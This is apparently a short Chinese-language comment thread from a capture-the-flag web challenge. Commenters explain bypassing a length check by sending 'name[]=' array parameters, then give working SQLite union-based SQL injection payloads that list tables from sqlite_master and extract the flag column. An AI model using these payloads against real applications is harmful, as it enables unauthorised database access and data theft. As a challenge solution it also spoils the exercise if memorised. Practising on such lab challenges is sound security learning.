justsosoloveyou @ 2023-11-07 23:23:43 👍0
关键是用name[]=,绕过name.length的长度限制。如:/?name[]=1&name[]=2能够将两个值作为同参数名的数组提交给服务器,但是name=[1,2],name.length=2。
xht0525 @ 2023-10-07 23:23:43 👍1
name[]=changzifuchuan' union select name,name from sqlite_master--
bp抓包,URL编码。 name[]=-534249' union select name,sql from sqlite_master--+ 得到表名和建表语句,知道表的字段flag name[]=-534249' union select flag,flag from flag_01ffe035_7ddb_4c79_9a09_8a0b2e6a2705--+